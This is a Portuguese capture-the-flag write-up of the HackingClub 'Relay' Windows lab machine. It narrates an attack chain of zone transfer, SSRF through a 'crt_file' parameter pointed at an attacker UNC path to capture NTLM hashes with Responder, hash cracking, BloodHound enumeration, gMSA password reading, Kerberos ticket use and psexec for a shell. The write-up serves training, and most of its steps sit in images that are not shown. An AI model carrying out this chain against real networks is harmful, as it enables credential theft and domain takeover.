HackingClub Relay Write-up
0
0

HackingClub Relay Write-up

Resolução da maquina Relay do Hackinclub.

Roberto Francisco
3 min
0
0
Email image

A máquina Relay pertence ao Hackingclub, para poder ter acesso a essa máquina é necessário assinar o Hackingclub.

A máquina está classificada como nível Difícil e seu sistema operacional é Windows.

                                                 Reconhecimento

Primeira etapa é fazer o reconhecimento inicial de portas e serviços disponíveis no alvo. Para essa finalidade utilizaremos a ferramenta Nmap.

Nmap -sS -sV -v <IP>

Resultado:

Email image

Identificamos os serviços e as portas disponíveis, como também o nome do domínio relay.uhclabs.

Adicione no / etc/ hosts.

Email image

Verificaremos se o servidor DNS permite transferência de zona com o utilitário dig, comando:

dig axfr relay.uhclabs @relay.uhclabs

Resultado:

Email image

Identificamos que o servidor permite transferência de zona. 

Nos utilizaremos o subdomínio ‘cert.relay.uhclabs’.

Salve no / etc/ hosts

Email image

Acessaremos o subdomínio pelo browser

Resultado:

Email image

Servidor retornou uma mensagem que precisamos definir o valor do parâmetro “crt_file”.

Iniciaremos um servidor Python.

Email image

Definiremos o parâmetro com a url pertencente ao nosso servidor.

Email image

Enviamos a requisição.

Resultado:

Email image

Encontramos a vulnerabilidade de Server-Side Request Forgery(SSRF).

                                                           Exploração

Utilizaremos a ferramenta Responder para tentar capturar alguma credencial.

Email image

No parâmetro vulnerável ‘crt_file’ colocaremos  \\<Seu-IP>/tantofaz  para o servidor tentar conectar-se a um suposto serviço do Samba, enviamos a requisição.

Retornando ao responder temos o seguinte resultado.

Resultado:

Email image

O alvo está vulnerável a NTLM Relay Attack, conseguimos capturar nome de usuário e hash de senha.

Salvaremos o Hash em um arquivo e iniciaremos a ‘quebra’ com o John the ripper

Email image

Resultado:

Email image

Utilizaremos a ferramenta ldapdomaindump para coletar todos os objetos do domínio e salvar em nossa máquina.

Email image

Foram salvos esses arquivos presentes na imagem a baixo, contendo informações sobre o active directory.

Resultado:

Email image

Iniciaremos servidor HTTP python para melhor leitura.

Resultado:

Email image

Acessando o domain_users.html.

Email image

Encontramos a Primeira Flag. 

Email image

Utilizaremos a ferramenta Bloodhound para entendermos como podemos obter acesso a máquina.

bloodhound-python -u op -p <password> -ns 172.31.17.35 -d relay.uhclabs -c all 

Resultado:

Email image

Foram salvos esses arquivos .json presentes na imagem a baixo, contendo informações sobre o active directory

Email image

Selecione os arquivos, abra no bloodhound e selecione a opção “Find Shortest Paths To Domain Admins”.

Email image

Resultado:

Email image

O usuário OP pode ler senha GMSA do usuário svc_webapp.

Utilizaremos o acesso do usuário op para ler o GMSA password.

Email image

Hash capturado, então usaremos o hash e o usuário capturado para obter um ticket no kerberos para acessar a máquina alvo.  

Email image

Ticket salvo.

Exportaremos a variável “KRB5CCNAME” para o psexec encontrar o ticket que foi salvo.

Email image

Utilizaremos o psexec com o ticket para pegar uma shell.

Email image

E capturamos a última flag.

Email image
Email image